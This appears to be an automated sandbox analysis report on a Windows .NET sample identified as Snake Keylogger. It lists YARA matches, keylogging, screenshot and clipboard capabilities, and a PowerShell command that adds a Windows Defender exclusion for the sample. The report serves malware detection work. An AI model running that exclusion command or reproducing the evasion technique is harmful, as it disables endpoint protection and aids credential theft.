Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49786 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture screen (.Net source)
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Contains functionality to log keystrokes (.Net Source)
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_02DDD55C 0_2_02DDD55C
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07538BD8 0_2_07538BD8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07533470 0_2_07533470
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07532C00 0_2_07532C00
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_075354C8 0_2_075354C8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_075354B8 0_2_075354B8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07530006 0_2_07530006
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07533038 0_2_07533038
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07535090 0_2_07535090
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_03215362 5_2_03215362
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321D278 5_2_0321D278
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_03217118 5_2_03217118
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321C148 5_2_0321C148
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321A088 5_2_0321A088
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321C738 5_2_0321C738
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321C468 5_2_0321C468
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321CA08 5_2_0321CA08
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_032169B0 5_2_032169B0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321E988 5_2_0321E988
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321CFAB 5_2_0321CFAB
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321CCD8 5_2_0321CCD8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321F631 5_2_0321F631
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_03213AA1 5_2_03213AA1
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321FA88 5_2_0321FA88
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321E97B 5_2_0321E97B
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_032129EC 5_2_032129EC
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_032139EF 5_2_032139EF
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_03213E09 5_2_03213E09
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC1E80 5_2_06FC1E80
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC17A0 5_2_06FC17A0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC0B30 5_2_06FC0B30
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9C70 5_2_06FC9C70
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC5028 5_2_06FC5028
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC2968 5_2_06FC2968
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9548 5_2_06FC9548
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCEAF8 5_2_06FCEAF8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCE6B0 5_2_06FCE6B0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCE6AF 5_2_06FCE6AF
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCE6A0 5_2_06FCE6A0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC1E74 5_2_06FC1E74
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC1E70 5_2_06FC1E70
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCE258 5_2_06FCE258
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCE249 5_2_06FCE249
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCDE00 5_2_06FCDE00
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCF3B8 5_2_06FCF3B8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC8BA0 5_2_06FC8BA0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC1798 5_2_06FC1798
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC8B95 5_2_06FC8B95
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC8B90 5_2_06FC8B90
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC178F 5_2_06FC178F
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCEF60 5_2_06FCEF60
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCEF51 5_2_06FCEF51
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9328 5_2_06FC9328
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC0B20 5_2_06FC0B20
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCEB08 5_2_06FCEB08
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCD0F8 5_2_06FCD0F8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCCCA0 5_2_06FCCCA0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9C6D 5_2_06FC9C6D
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCFC68 5_2_06FCFC68
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCFC5F 5_2_06FCFC5F
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC0040 5_2_06FC0040
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC5025 5_2_06FC5025
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC001E 5_2_06FC001E
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC501B 5_2_06FC501B
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCF810 5_2_06FCF810
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCF801 5_2_06FCF801
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCDDFE 5_2_06FCDDFE
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCD9A8 5_2_06FCD9A8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCD999 5_2_06FCD999
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC295B 5_2_06FC295B
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCD550 5_2_06FCD550
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9540 5_2_06FC9540
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCD540 5_2_06FCD540
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0719BE50 5_2_0719BE50
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_07195878 5_2_07195878
Sample file is different than original file name gathered from version info
Source: NXPYoHNSgv.exe, 00000000.00000002.2158732190.0000000007B8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2152290661.000000000118E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2157761178.0000000007460000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2153199131.0000000002E01000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000446000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000005.00000002.4629872184.00000000075A9000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe Binary or memory string: OriginalFilenamejBGm.exe8 vs NXPYoHNSgv.exe
Uses 32bit PE files
Source: NXPYoHNSgv.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: NXPYoHNSgv.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, aLPFebSbot9WYKQxSZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.SetAccessControl
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.AddAccessRule
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, aLPFebSbot9WYKQxSZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.SetAccessControl
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.AddAccessRule
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.SetAccessControl
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.AddAccessRule
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, aLPFebSbot9WYKQxSZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/7@4/4
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NXPYoHNSgv.exe.log Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv2p2dje.kec.ps1 Jump to behavior
Source: NXPYoHNSgv.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NXPYoHNSgv.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: NXPYoHNSgv.exe ReversingLabs: Detection: 60%
Source: NXPYoHNSgv.exe Virustotal: Detection: 39%
Source: unknown Process created: C:\Users\user\Desktop\NXPYoHNSgv.exe "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Users\user\Desktop\NXPYoHNSgv.exe "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NXPYoHNSgv.exe" Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Users\user\Desktop\NXPYoHNSgv.exe "C:\Users\user\Desktop\NXPYoHNSgv.exe" Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: gpapi.dll Jump to behavior
